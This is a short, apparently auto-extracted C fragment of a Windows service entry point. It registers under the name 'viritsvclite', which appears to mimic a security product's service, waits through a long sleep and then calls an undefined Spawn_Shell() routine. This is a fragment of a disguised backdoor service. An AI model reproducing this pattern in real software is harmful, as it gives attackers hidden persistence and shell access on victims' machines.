
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_3__ TYPE_1__ ;


struct TYPE_3__ {int dwControlsAccepted; int dwCurrentState; scalar_t__ dwWaitHint; scalar_t__ dwCheckPoint; scalar_t__ dwServiceSpecificExitCode; scalar_t__ dwWin32ExitCode; int dwServiceType; } ;
typedef int LPHANDLER_FUNCTION ;


 scalar_t__ ControlHandler ;
 int RegisterServiceCtrlHandler (char*,int ) ;
 int SERVICE_ACCEPT_SHUTDOWN ;
 int SERVICE_ACCEPT_STOP ;
 int SERVICE_RUNNING ;
 int SERVICE_START_PENDING ;
 int SERVICE_WIN32 ;
 TYPE_1__ ServiceStatus ;
 int SetServiceStatus (int ,TYPE_1__*) ;
 int Sleep (int ) ;
 int Spawn_Shell () ;
 int big_sleep ;
 int hStatus ;

void ServiceMain(int argc, char **argv) {
 ServiceStatus.dwServiceType = SERVICE_WIN32;
 ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
 ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
 ServiceStatus.dwWin32ExitCode = 0;
 ServiceStatus.dwServiceSpecificExitCode = 0;
 ServiceStatus.dwCheckPoint = 0;
 ServiceStatus.dwWaitHint = 0;
 hStatus = RegisterServiceCtrlHandler("viritsvclite", (LPHANDLER_FUNCTION) ControlHandler);
 ServiceStatus.dwCurrentState = SERVICE_RUNNING;
 SetServiceStatus(hStatus, &ServiceStatus);


 Sleep(big_sleep);

 Spawn_Shell();







 return;
}
